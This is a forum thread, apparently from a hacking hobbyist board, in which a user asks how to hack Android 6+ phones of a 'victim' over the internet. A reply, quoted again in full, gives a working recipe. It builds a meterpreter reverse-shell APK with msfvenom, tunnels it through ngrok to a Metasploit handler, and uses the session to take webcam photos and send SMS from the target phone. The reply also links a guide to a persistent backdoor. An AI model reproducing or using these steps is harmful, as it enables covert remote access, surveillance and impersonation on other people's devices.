Jump to content

[Question] Android hacking (via payload)


Benny639
 Share

Recommended Posts

Hi there! i was hacking android 5 and 4 with evil-droid and sometimes with metasploit but now for hacking android 6 and higher...i can't manage to get a strong meterpreter session from victim.Meterpreter session open and close immediately(Possibly due to android 6 and higher more security)....Please guide me how can i hack android 6 and higher smoothly...if you have any other good way to hack android over wan then please let me know..Thank you!

Link to comment
Share on other sites

  • 2 weeks later...

Hi Benny!

 

^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!

 

I am interested in the same topic, and spent a lot of time this week making it all real.

 

Here is a summary of what I did to pwn my Android phone via my other Android phone:

1) Download Termux on Google play store.

2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh

3) git clone https://github.com/rapid7/metasploit-framework

4) CD metasploit-framework

5) bundle install (takes about 5 minutes)

6) Go to 

https://dashboard.ngrok.com/user/signup

And register a port forwarding free.

7) git clone https://github.com/inconshreveable/ngrok

 

8)CD ngrok

9)./ngrok tokenauth (your ngrok token) one time dealio

10) ping o.tcp.ngrok.io (get the ngrok IP address)

 

11) ./ngrok tcp 4564

12)open new windows session

Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework.

13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk

 

This creates payliad on Root directory in Android phone.

 

14) ./msfconsole

15) msf> use exploit /multi/handler

msf> set payload android/meterpreter/reverse_tcp

msf> set LHOST localhost

msf> set lport 4564

msf> exploit -j -z

 

16) run lolz.apk payload on other phone.

Ngrok waiting for session. Mad waiting for session.

Bvoila! Once it connects,

Type sessions -i 1 and see meterpreter.

Type help for commands.

Type command -h for help with a command.

webcam_snap -i 2 -p /sdcard/selfy.jpg

send_sms -d 2149711234 -t "what's up Darren :)"

commands here

https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699

 

You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article:

https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

 

Manz, your good to pwn. 

 

I also recommend, 

Git clone https:///github.com/RajkumrdusadTool-X

200 kali tools for termux!!

I love this pr09.

Please note: Ngrok port randomly changes, so your payload must co-align.

I haven't used evil Droid so maybe you know. ?

 

- คςเ๔ кɭ๏ฬภ

 

 

  • Upvote 2
Link to comment
Share on other sites

There are plenty of youtube videos on how to do this. Above post summarises the process pretty well too.

Technically speaking, you don't need ngrok to handle connections over WAN. You just need to add port forwarding rules on your router to direct traffic to your local listener/server address.

As for your closing connections, that could be for any number of reasons including: firewall rules blocking incoming/outgoing traffic on certain ports, misconfigred payloads, etc. I don't use android phones anymore so I haven't tested this on any new phones to confirm if new security policies are the issue.

Edited by icarus255
Inappropriate suggestion
Link to comment
Share on other sites

On 10/14/2018 at 5:03 AM, acid klown said:

Hi Benny!

 

^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team!

 

I am interested in the same topic, and spent a lot of time this week making it all real.

 

Here is a summary of what I did to pwn my Android phone via my other Android phone:

1) Download Termux on Google play store.

2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh

3) git clone https://github.com/rapid7/metasploit-framework

4) CD metasploit-framework

5) bundle install (takes about 5 minutes)

6) Go to 

https://dashboard.ngrok.com/user/signup

And register a port forwarding free.

7) git clone https://github.com/inconshreveable/ngrok

 

8)CD ngrok

9)./ngrok tokenauth (your ngrok token) one time dealio

10) ping o.tcp.ngrok.io (get the ngrok IP address)

 

11) ./ngrok tcp 4564

12)open new windows session

Slide thumb to the right. Offers termux new session. In new session, CD metasploit framework.

13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk

 

This creates payliad on Root directory in Android phone.

 

14) ./msfconsole

15) msf> use exploit /multi/handler

msf> set payload android/meterpreter/reverse_tcp

msf> set LHOST localhost

msf> set lport 4564

msf> exploit -j -z

 

16) run lolz.apk payload on other phone.

Ngrok waiting for session. Mad waiting for session.

Bvoila! Once it connects,

Type sessions -i 1 and see meterpreter.

Type help for commands.

Type command -h for help with a command.

webcam_snap -i 2 -p /sdcard/selfy.jpg

send_sms -d 2149711234 -t "what's up Darren :)"

commands here

https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699

 

You can make the connection persistent only as long as they are not rebooted. To make persistent shell, see this article:

https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

 

Manz, your good to pwn. 

 

I also recommend, 

Git clone https:///github.com/RajkumrdusadTool-X

200 kali tools for termux!!

I love this pr09.

Please note: Ngrok port randomly changes, so your payload must co-align.

I haven't used evil Droid so maybe you know. ?

 

- คςเ๔ кɭ๏ฬภ

 

 

A+

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...